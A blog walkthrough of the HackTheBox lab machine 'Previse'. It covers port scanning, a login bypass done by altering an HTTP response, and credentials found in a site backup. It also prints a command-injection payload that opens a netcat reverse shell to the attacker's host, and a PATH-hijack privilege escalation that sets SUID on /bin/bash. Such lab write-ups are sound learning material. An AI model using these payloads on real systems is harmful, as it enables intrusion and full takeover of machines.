HTB Walkthrough : Previse

So today we have a different challenge from HackTheBox called Previse . Its medium level box which some misconfiguration with web application . So without wasting time let go.

Level : Medium

Attacking Strategy

  • Network Scanning
    • Nmap
  • Enumeration
    • Content Discovery
    • Bypass login
  • Exploitation
    • Remote Code Execution
  • Privilege Escalation
    • MYSQL Dump
    • PATH Environment Privilege Escalation

Walkthrough

IP Address : 10.10.11.104

We start with Nmap scan which discover open ports with script scan which give more information about the services running on target machine like port 80 and port 22 . Nmap also reveal the information about the operating system which is Linux .

nmap -p- -sC -sV --min-rate 10000 -oN nmap 10.10.11.104
Nmap scan report for 10.10.11.104
Host is up (0.11s latency).
Not shown: 65481 filtered ports, 52 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 53:ed:44:40:11:6e:8b:da:69:85:79:c0:81:f2:3a:12 (RSA)
|   256 bc:54:20:ac:17:23:bb:50:20:f4:e1:6e:62:0f:01:b5 (ECDSA)
|_  256 33:c1:89:ea:59:73:b1:78:84:38:a4:21:10:0c:91:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-title: Previse Login
|_Requested resource was login.php
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Once we briefly check the Nmap result we start with port 80 which redirected to login page but we didn’t have any creds so tried the some default credential like admin , test , etc but failed .

After trying some SQL Injection also we got nothing so we fire up the Dirb scanner to enumerate the content on webserver with PHP extension as wappalyzer reveals this is PHP based website .

dirb http://10.10.11.104 -X .php

From the result we got some path but like config.php which have 200 status code but when we visit its redirect to login, on the same time nav.php also have 200 status code and so we browse it and check for the links like account creation , log data ,etc but when we visit them are redirect back to login page.

After doing some research we are able to create account making the changes in the request . So we simply open the burp and capture the request of “create accounts” there we simply response the request.

Make the change 300 to 200 ,as 200 its success status code.

Now create the account with username and password and make the login to website .

Once we are in , there are some options like accounts , management menu , files . Files look suspicious so we simply visit and there we have sitebackup.zip .

After downloading the sitebackup.zip its time to analyze them locally . So simply unzip and some good files here like config.php which generally have some database credential which is used by application to pass the database query .

<?php
function connectDB(){
    $host = 'localhost';
    $user = 'root';
    $passwd = '[email protected]!:)';
    $db = 'previse';
    $mycon = new mysqli($host, $user, $passwd, $db);
    return $mycon;
}
?>

Here we got some credentials as we are thinking but when we try with ssh it failed. After doing some more enumeration with other files we get to know about exec function where the application is running some log_process.py and print the output .

<?php
session_start();
if (!isset($_SESSION['user'])) {
    header('Location: login.php');
    exit;
}
?>

<?php
if (!$_SERVER['REQUEST_METHOD'] == 'POST') {
    header('Location: login.php');
    exit;
}

/////////////////////////////////////////////////////////////////////////////////////
//I tried really hard to parse the log delims in PHP, but python was SO MUCH EASIER//
/////////////////////////////////////////////////////////////////////////////////////

$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
echo $output;

$filepath = "/var/www/out.log";
$filename = "out.log";    

if(file_exists($filepath)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="'.basename($filepath).'"');
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($filepath));
    ob_clean(); // Discard data in the output buffer
    flush(); // Flush system headers
    readfile($filepath);
    die();
} else {
    http_response_code(404);
    die();
} 
?>

Exploitation

After reading the program we simply make the request log data with file delimiter and try to perform RCE by making the ping back request and intercept with tcpdump which is successful so its time to get the reverse shell .

After capture the request modify the delim with reverse payload and if everything is good we got the session.

delim=comma%26nc -e /bin/sh 10.10.14.42 1245

Privilege Escalation

Finally we are on server its time to get root . According to my checkpoint start enumeration with suid bit , checking passwd file but nothing . After sometime we try dump some data from database with those credential which we got from the config file . After making some database query we have the user m4lwhere hashed . Once we cracked those hash we got the password .

Username : m4lwhere
Passowrd : ilovecody112235!

These credentials are valid to make SSH login into the server .Once we are with m4lwhere user checked for Sudoers and here access_backup.sh can run with root right without need the root credentials .

sudo -l

The script simply doing the some backup of the logs by zip them with gzip tool so we simply performed the path environment privilege escalation .

cd /tmp
echo "chmod 4777 /bin/bash" >gzip
chmod 777 gzip
export PATH=/tmp:$PATH
sudo /opt/scripts/access_backup.sh
/bin/bash -p
id
cat /root/root.txt

We got the root collect your gems and enjoy .

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.